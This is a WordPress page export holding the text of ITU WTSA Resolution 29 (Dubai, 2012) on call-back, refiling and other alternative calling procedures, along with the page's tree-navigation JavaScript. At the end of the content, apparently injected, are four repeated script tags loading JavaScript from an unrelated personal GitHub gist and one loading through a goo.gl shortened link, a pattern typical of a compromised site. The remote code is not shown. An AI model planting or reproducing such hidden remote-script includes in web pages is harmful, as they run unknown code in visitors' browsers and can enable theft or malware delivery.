{"id":715,"date":"2013-06-18T22:36:05","date_gmt":"2013-06-19T02:36:05","guid":{"rendered":"http:\/\/internetdistinction.com\/wsisimpacts\/?page_id=715"},"modified":"2015-06-30T00:30:28","modified_gmt":"2015-06-30T04:30:28","slug":"wtsa_29","status":"publish","type":"page","link":"https:\/\/internetdistinction.com\/wsisimpacts\/wsis\/wtsa\/wtsa-2012\/wtsa_29\/","title":{"rendered":"WTSA Resolution 29"},"content":{"rendered":"<p><style type=\"text\/css\">\r\nbody {}\r\n\r\n:link { color: #0000ff; text-decoration:none;}\r\n:visited { color: #6666ff; text-decoration:none; }\r\na:active { color: #0000ff; text-decoration:none;}\r\na:hover {color: #0000ff; text-decoration:underline; }\r\n\r\ndiv.basetext {}\r\n\r\ndiv.basetop {}\r\n\r\nh1 {\r\n    text-align:center;\r\n}\r\n\r\nspan.h2 {}\r\n\r\ndiv.year {}\r\n\r\ndiv.form {}\r\n\r\nspan.cpt {}\r\n\r\nspan.cm {}\r\n\r\n.fl {}\r\n\r\nul {}\r\n\r\nli {}\r\n\r\nul li {}\r\n\r\nli.basic {}\r\n\r\nspan.links {}\r\n\r\n\r\n\r\n\r\n.sub { display: none; }\r\n.subexp {display: block; }\r\n.sub { display: none; } \r\n\r\n.subexp {display: block; } \r\n\r\nli.exp {\r\n  cursor:pointer;\r\n}\r\n\r\nli.col {\r\n  cursor:pointer;\r\n}\r\n\r\nli.exp_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\nli.col_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\n\r\nli.basic_active {\r\n  background-color:#eeeeff;\r\n}\r\n<\/style><br \/>\n<SCRIPT language=JavaScript>\r\nfunction get_keycode(evt) {\r\n  \/\/ IE\r\n    code = document.layers ? evt.which\r\n           : document.all ? event.keyCode \/\/ event.keyCode!=evt.keyCode!\r\n           : evt.keyCode;\r\n\r\n  if (code==0) \r\n    code=evt.which; \/\/ for NS\r\n  return code;\r\n}\r\n\r\nvar lastnode=null;\r\nvar listnodes = null;\r\nvar list_index=1;\r\nvar lastnodetype=''; \/\/ determines if node is a link, input or text;\r\n\r\n\/\/ up, left, down, right, keypress codes\r\n\/\/ijkl\r\n\/\/var keys = new Array(105,106,107,108);\r\n\/\/num arrows\r\n\/\/var keys = new Array(56,52,50,54);\r\n\/\/wasd\r\n\/\/ var press2 = new Array(119,97,115,100);\r\n var press = new Array(47,45,42,43);\r\n\r\n\/\/ keydown codes\r\n  \/\/  var keys2=new Array(87,65,83,68);\r\n  var keys= new Array(38,37,40,39);\r\n\r\n  \/\/ keyset 1 = keydown, otherwise press\r\nfunction checkup(keyset,n) {\r\n  if (keyset==1) return (n==keys[0]);\r\n  return ((n==press[0]) \/*|| (n==press2[0])*\/)\r\n}\r\n\r\nfunction checkdn(keyset,n) {\r\n  if (keyset==1) return (n==keys[2]);\r\n  return ((n==press[2]) \/*|| (n==press2[2])*\/)\r\n}\r\n\r\nfunction checkl(keyset,n) {\r\n  if (keyset==1) return (n==keys[1]);\r\n  return ((n==press[1]) \/*|| (n==press2[1])*\/)\r\n}\r\n\r\nfunction checkr(keyset,n) {\r\n  if (keyset==1) return (n==keys[3]);\r\n  return ((n==press[3]) \/*|| (n==press2[3])*\/)\r\n}\r\n\r\n\r\n\r\n\r\n\r\nfunction is_exp(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='exp') || (n.className=='exp_active'));\r\n}\r\n\r\nfunction is_col(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='col') || (n.className=='col_active'));\r\n}\r\n\r\nfunction is_basic(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='basic') || (n.className=='basic_active'));\r\n}\r\n\r\n\r\n\r\n\/* returns i>=0 if true *\/\r\nfunction is_active(node) {\r\n  if (node.className==null) return false\r\n  return node.className.indexOf('_active');\r\n}\r\n\r\nfunction toggle_class(node) {\r\n  if ((node==null) || (node.className==null)) return;\r\n  str=node.className;\r\n  result=\"\";\r\n  i = str.indexOf('_active');\r\n  if (i>0)\r\n    result= str.substr(0,i);\r\n  else\r\n    result= str+\"_active\";\r\n  node.className=result; \r\n  return node;\r\n}\r\n\r\nfunction activate(node) {\r\n  node.style.backgroundColor='#eeeeff';\r\n}\r\n\r\nfunction deactivate(node) {\r\n   node.style.backgroundColor='#ffffff';\r\n}\r\n\r\nfunction is_list_node(n) {\r\n  if (n==null) return false;\r\n  if (n.className==null) return false;\r\n  if ( (is_exp(n)) || \r\n       (is_col(n)) ||\r\n       (is_basic(n)) )\r\n   return true; else return false;\r\n}\r\n\r\n\r\nfunction get_href(n) {\r\n  alist=n.attributes;\r\n  if (alist!=null) {\r\n    hr = alist.getNamedItem('href');\r\n    if (hr!=null) return hr.nodeValue;\r\n  }\r\n  if (n.childNodes.length==0) return '';\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_href(n.childNodes[i]);\r\n    if (s!='') return s;\r\n  }\r\n  return '';\r\n}\r\n\r\nfunction get_link(n) {\r\n  if (n==null) return null;\r\n  if (n.style==null) return null;\r\n\r\n \/\/ disabling uncontrolled recursion to prevent error messages on IE\r\n \/\/ when trying to focus to invisible links (readonly mode)\r\n\/\/    alert(n.nodeName+' '+n.className);\r\n  if ((n.nodeName=='UL') && (n.className=='sub')) return null;\r\n\r\n  if (n.nodeName=='A') return n;\r\n  if (n.childNodes.length==0) return null;\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_link(n.childNodes[i]);\r\n    if (s!=null) return s;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction set_lastnode(n) {\r\n\/*var d = new Date();\r\nvar t_mil = d.getMilliseconds();*\/\r\n\/\/ testattu nopeuksia explorerilla, ei merkitt\u00e4vi\u00e4 eroja\r\n  if (lastnode==n) return; \r\n\/*  deactivate(lastnode)\r\n  lastnode=n;\r\n  activate(lastnode);*\/\r\n\r\n  if (is_active(lastnode)>=0)\r\n    toggle_class(lastnode);\r\n  lastnode=n;\r\n  if (!(is_active(lastnode)>=0))\r\n    toggle_class(lastnode);\r\n\r\n\r\n\/*var d2 = new Date();\r\nvar t_mil2 = d2.getMilliseconds();\r\n  window.alert(t_mil2-t_mil);*\/\r\n}\r\n\r\nfunction next_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex<listnodes.length-1) {\r\n    tempIndex++;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\nfunction prev_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex>0) {\r\n    tempIndex--;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\n\r\n\r\nfunction getsub (li) {\r\n  if (li.childNodes.length==0) return null;\r\n  for (var c = 0; c < li.childNodes.length; c++)\r\n    if ( (li.childNodes[c].className == 'sub') || (li.childNodes[c].className == 'subexp') ) \r\n      return li.childNodes[c];\r\n}\r\n\r\nfunction find_listnode_recursive (li) {\r\n  if (is_list_node(li)) return li; \r\n  if (li.childNodes.length==0) return null;\r\n  result=null;\r\n  for (var c = 0; c < li.childNodes.length; c++) {\r\n    result=find_listnode_recursive(li.childNodes[c]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction next_child_listnode(li) {\r\n  var result=null;\r\n  for (var i=0; i<li.childNodes.length; i++) {\r\n    result=find_listnode_recursive(li.childNodes[i]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;  \r\n}\r\n\r\nfunction next_actual_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction next_sibling_listnode(li) {\r\nif (li==null) return null; \r\n var result=null;\r\n  var temp=li;\r\n  if (is_col(temp)) return next_child_listnode(temp);\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction last_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var last=null;\r\n  while(1) {\r\n    var n = temp.nextSibling;\r\n    if (is_list_node(temp)) \r\n      last = temp;\r\n    if (n==null) {\r\n      if (is_col(last)) return last_sibling_listnode(next_child_listnode(last));\r\n      else return last;\r\n    }\r\n    temp = n;\r\n  }\r\n}\r\n\r\nfunction prev_sibling_listnode(li) { \r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var n = null;\r\n  while (1) { \r\n    n = temp.previousSibling;\r\n    if (n==null) {\r\n      return parent_listnode(li);\r\n    }\r\n    if (is_list_node(n)) {\r\n      if (is_col(n)) { \r\n        return last_sibling_listnode(next_child_listnode(n));\r\n      }\r\n      else {\r\n        return n;\r\n      }\r\n    }\r\n    temp=n;\r\n  }\r\n}\r\n\r\n\r\nfunction parent_listnode(li) {\r\n  \/\/ added 12.7.2004 to prevent IE error when readonly mode==true\r\n  if (li==null) return null;\r\n  n=li;\r\n  while (1) {\r\n    n=n.parentNode;\r\n    if (n==null) return null;\r\n    if (is_list_node(n)) return n;\r\n  }\r\n}\r\n\r\nfunction getVisibleParents(id) {\r\n  var n = document.getElementById(id);\r\n  while(1) {\r\n    expand(n);\r\n    n = parent_listnode(n);\r\n    if (n==null) return;\r\n  }\r\n}\r\n\r\nfunction onClickHandler (evt) {\r\nif (lastnode==null) \r\n{\r\nlistnodes = document.getElementsByTagName('li');\r\nlastnode=listnodes[1];\r\ntemp=listnodes[1];\r\n}\r\n\r\n\r\n  var target = evt ? evt.target : event.srcElement;\r\n  if (!is_list_node(target)) return;\r\n  toggle(target);\r\n  set_lastnode(target);\r\n}\r\n\r\n\r\nfunction expand(node) {\r\n    if (!is_exp(node)) return;\r\n    if (node.className=='exp_active') \r\n      node.className='col_active';\r\n    else \r\n        node.className='col';\r\n    setSubClass(node,'subexp');\r\n    \/\/    getsub(node).className='subexp';\r\n}\r\n\r\nfunction collapse(node) {\r\n  if (!is_col(node)) return;\r\n  \r\nif (node.className=='col_active')\r\n    node.className='exp_active'\r\n  else \r\n    node.className='exp';\r\n\r\n setSubClass(node,'sub');\r\n\/\/  getsub(node).className='sub';\r\n\r\n}\r\n\r\nfunction setSubClass(node,name) {\r\n  sub = getsub(node);\r\n  if (sub==null) return;\r\n  sub.className=name;  \r\n}\r\n\r\nfunction toggle(target) {\r\n  if (!is_list_node(target)) return;\r\n    if (is_col(target)) {\r\n      target.className='exp';\r\n      setSubClass(target,'sub');\r\n      \/\/      getsub(target).className='sub';\r\n    }\r\n    else if (is_exp(target)) {\r\n      target.className='col';\r\n      setSubClass(target,'subexp');\r\n      \/\/      getsub(target).className='subexp';\r\n    }\r\n \r\n}\r\n\r\nfunction expandAll(node) {\r\n    if (node.className=='exp') {\r\n        node.className='col';\r\n        setSubClass(node,'subexp');\r\n\/\/        getsub(node).className='subexp';\r\n    }\r\n    var i;\r\n    if (node.childNodes!=null) \r\n\/\/    if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            expandAll(node.childNodes[i]);\r\n}\r\n\r\nfunction collapseAll(node) {\r\n    if  (node.className=='col') {\r\n        node.className='exp';\r\n        setSubClass(node,'sub');\r\n\/\/        getsub(node).className='sub';\r\n    }\r\n    var i;        \r\n    if (node.childNodes!=null) \r\n\/\/ for opera   if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            collapseAll(node.childNodes[i]);\r\n}\r\n\r\n\r\n\r\nfunction unFocus(node) {\r\n     \/\/ unfocuses potential link that is to be hidden (if a==null there is no link so it should not be blurred).\r\n     \/\/ tested with mozilla 1.7, 12.7.2004. \/mn (\r\n      intemp=parent_listnode(node);  \r\n      a = get_link(intemp);     \/\/ added 6.4. to get keyboard working with\r\n      \/\/ moved before collapse to prevent an error message with IE when readonly==true      \r\n      if (a!=null) a.blur(); \/\/ netscape after collapsing a focused node\r\n      return intemp;\r\n}\r\n\r\n\/\/ mode: 0==keypress, 1==keyup\r\nfunction keyfunc(evt,mode) {\r\n var c = get_keycode(evt);\r\n var temp = null;\r\n var a = null;\r\n\r\n  if (lastnode==null) {\r\n    listnodes = document.getElementsByTagName('li');\r\n    lastnode=listnodes[1];\r\n    temp=listnodes[1];\r\n  }\r\n\r\n  \/\/window.alert(c);\r\n  if (checkup(mode,c)) { \/\/ i \r\n   temp=prev_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkdn(mode,c)) { \/\/ k\r\n    temp=next_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkr(mode,c)) { \/\/ l\r\n    expand(lastnode);\r\n    \/\/  temp=next_child_listnode(lastnode);\r\n    \/\/ if (temp==null) {\r\n      a = get_link(lastnode);\r\n        if (a!=null) a.focus(); else self.focus(); \r\n      \/\/}\r\n  }\r\n  else if (checkl(mode,c)) { \/\/ j\r\n    if (is_col(lastnode)) {\r\n      unFocus(lastnode);\r\n      collapse(lastnode);\r\n    }\r\n    else {\r\n      temp=unFocus(lastnode);\r\n      collapse(temp);\r\n    }\r\n   \/\/    if (temp==null) lastnode.focus(); \/\/ forces focus to correct div (try mozilla typesearch) (doesn't seem to work -mn\/6.4.2004)\r\n  }\r\n  else return;\r\n  if (temp!=null) set_lastnode(temp);\r\n\r\n  \/\/ alert('pressed ' + String.fromCharCode(c) + '(' + c + ')');\r\n  return true;\r\n}\r\n\r\n\r\nfunction keytest (evt) {\r\n  return keyfunc(evt,1);\r\n};\r\n\r\n\r\nfunction presstest (evt) {\r\n  return keyfunc(evt,0);\r\n};\r\n\r\n\r\n  document.onclick = onClickHandler;\r\n  document.onkeypress = presstest;\r\n  document.onkeyup = keytest;\r\n<\/SCRIPT><\/p>\n<h3><span style=\"\">WTSA RESOLUTION 29 (Rev. Dubai, 2012)<\/span><\/h3>\n<h4><span style=\"\">Alternative calling procedures on international telecommunication networks<\/span><\/h4>\n<p><span style=\"\">The World Telecommunication Standardization Assembly (Dubai, 2012),<\/span><\/p>\n<ul class=\"subexp\">\n<li class=\"exp\" style=\"\"><span style=\"\">recalling<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        Resolution 1099, adopted by the Council at its 1996 session, concerning alternative calling procedures on international telecommunication networks, which urged the ITU Telecommunication Standardization Sector (ITU-T) to develop, as soon as possible, the appropriate Recommendations concerning alternative calling procedures;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        Resolution 22 (Rev. Hyderabad, 2010) of the World Telecommunication Development Conference, in particular its resolves 1, 2, 3 and 4;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        Resolution 21 (Rev. Antalya, 2006) of the Plenipotentiary Conference, on alternative calling procedures on telecommunication networks, in particular its resolves 1, 2 and 3,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">recognizing<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        that call-back, refiling, non-identification1 and other alternative calling procedures, which may be potentially harmful, are not permitted in many countries and permitted in some others;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        that call-back, inappropriate hubbing, refiling, non-identification and other alternative calling procedures, which may be potentially harmful, offer alternative calling procedures which may be attractive for users;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        that call-back, inappropriate hubbing, refiling, non-identification and other alternative calling procedures, which may be potentially harmful and may impact the revenue of operating agencies authorized by Member States, which may seriously hamper, in particular, the efforts of developing countries2, for the sound development of their telecommunication networks and services;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        that distortions in traffic patterns resulting from call-back, inappropriate hubbing, refiling, non-identification and other alternative calling procedures, which may be potentially harmful, may impact traffic management and network planning;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e)        that some forms of call-back seriously degrade the performance and quality of the public switched telephone network (PSTN),<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">considering<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">the results of the ITU workshop on alternative calling procedures and origin identification held in Geneva on 19-20 March 2012,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">reaffirming<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        that it is the sovereign right of each country to regulate its telecommunications and as such it may permit, prohibit or otherwise regulate call-back, refiling or matters related to caller identification in its territory;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        that the ITU Constitution, in its Preamble, gave regard to &#8220;the growing importance of telecommunication for the preservation of peace and the economic and social development of all States&#8221;, and that Member States agreed in the Constitution with &#8220;the object of facilitating peaceful relations, international cooperation among peoples and economic and social development by means of efficient telecommunication services&#8221;,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">noting<\/span>\n<ul class=\"sub\">\n<li class=\"exp\" style=\"\"><span style=\"\">that in order to minimize the effect of alternative calling procedures:<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">i)        operating agencies authorized by Member States should, within their national law, make every effort to establish the level of collection charges on a cost-oriented basis, taking into account Article 6.1.1 of the International Telecommunication Regulations and Recommendation ITU-T D.5;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">ii)        administrations and operating agencies authorized by Member States should vigorously pursue the implementation of Recommendation ITU-T D.140 and the principle of cost-oriented accounting rates and accounting-rate shares,<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">resolves<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        that administrations and operating agencies authorized by Member States should take, to the furthest extent practicable, all measures to suspend the methods and practices of call-back which seriously degrade the quality and the performance of the PSTN, such as constant calling (or bombardment or polling) and answer suppression;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        that administrations and operating agencies authorized by Member States should take a cooperative approach to respecting the national sovereignty of others, and suggested guidelines for this collaboration are attached;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3        to continue developing appropriate Recommendations concerning alternative calling procedures and, in particular, the technical aspects of the methods and practices of call-back which seriously degrade the quality and the performance of the PSTN, such as constant calling (or bombardment or polling) and answer suppression;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">4        to instruct ITU-T Study Group 2 to study other aspects and forms of alternative calling procedures, including refiling and non-identification, and service definition and requirements for hubbing;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">5        to instruct ITU-T Study Group 3 to study the economic effects of call-back, refiling and inappropriate hubbing and other forms of alternative calling procedures, as well as origin non-identification or spoofing, on the effort of developing countries for sound development of their local telecommunication networks and services, and to evaluate in cooperation with Study Group 2 the effectiveness of the suggested guidelines on call-back,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">instructs the Director of the Telecommunication Standardization Bureau<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">to continue to cooperate with the Director of the Telecommunication Development Bureau in order to facilitate the participation of developing countries in these studies and to make use of the results of the studies, and in the implementation of this resolution.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">Attachment (to Resolution 29)<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">Suggested guidelines for administrations and operating agencies authorized by Member States for consultation on call-back<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">(See chart at: http:\/\/www.itu.int\/pub\/publications.aspx?lang=en&amp;parent=T-RES-T.29-2012)<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">In the interest of global development of international telecommunications, it is desirable for administrations and operating agencies authorized by Member States to cooperate with others and to take a collaborative approach. Any cooperation and any subsequent actions would have to take account of the constraints of national laws. The following guidelines are recommended to be applied in country X (the location of the call-back user) and country Y (the location of the call-back provider) regarding call-back. When call-back traffic is destined to a country other than countries X or Y, the sovereignty and the regulatory status of the destination country should be respected.<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">Country X        (location of call-back user)<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">Country Y        (location of call-back provider)<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">A generally collaborative and reasonable approach is desirable<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">Administration X, wishing to restrict or prohibit call-back, should establish a clear policy position<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">Administration X should make known its national position<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">Administration Y should bring this information to the attention of operating agencies authorized by Member States and call-back providers in its territory using whatever official means are available<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">Administration X should instruct operating agencies authorized by Member States operating in its territory as to the policy position, and those operating agencies authorized by Member States should take steps to ensure that their international operating agreements comply with that position<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">Operating agencies authorized by Member States in Y should cooperate in considering any necessary modifications to international operating agreements<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/goo.gl\/dd1kPI'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>WTSA RESOLUTION 29 (Rev. Dubai, 2012) Alternative calling procedures on international telecommunication networks The World Telecommunication Standardization Assembly (Dubai, 2012), recalling a) Resolution 1099, adopted by the Council at its 1996 session, concerning alternative calling procedures on international telecommunication networks, which urged the ITU Telecommunication Standardization Sector (ITU-T) to develop, as soon as possible, the [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":1545,"menu_order":29,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-715","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/715","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/comments?post=715"}],"version-history":[{"count":0,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/715\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1545"}],"wp:attachment":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/media?parent=715"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}